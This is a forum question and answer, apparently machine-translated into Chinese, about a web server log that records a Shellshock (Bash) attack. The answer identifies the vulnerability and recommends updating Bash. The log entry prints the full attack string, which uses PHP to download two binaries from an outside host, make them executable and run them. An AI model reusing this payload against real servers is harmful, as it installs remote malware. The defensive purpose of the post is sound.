我們發現了由網頁伺服器使用者執行的二/tmp/susu1進位。/tmp/susu2
在日誌中我們有以下條目:
[24/Sep/2015:06:09:34 +0200] "GET /cgi-sys/entropysearch.cgi HTTP/1.0" 301 0 "() { :;} ;
echo;/usr/local/bin/php -r '$a = \"http://x5d.su/s/susu1\";''$b = \"http://x5d.su/s/susu2\";
''$c = sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''
$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''
if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''
$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''
$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
但我們只發現此類請求的錯誤碼為301、302、403、404、500。沒有 200er 代碼表明駭客攻擊成功。
這是一個常見的安全問題嗎?如何解決?或如何進一步追蹤?
答案1
這似乎是一次 shellshock 攻擊,它於 2014 年 9 月 24 日首次宣布,當時 bash 發布了針對此錯誤的修復。
當命令連接到儲存在環境變數值中的函數定義的末端時,第一個錯誤會導致 Bash 無意中執行命令。1[6] 在本文發布後的幾天內,對底層設計缺陷的嚴格審查發現了各種相關漏洞(CVE-2014-6277、CVE-2014-6278、CVE-2014-7169、CVE-2014-7186、和CVE-2014-7187); Ramey 透過一系列進一步的補丁解決了這個問題。
您可以檢查您的系統是否容易受到攻擊,如中所述如何測試我的伺服器是否容易受到 ShellShock 漏洞的攻擊?
您必須更新系統或至少更新 Bash 版本才能解決問題。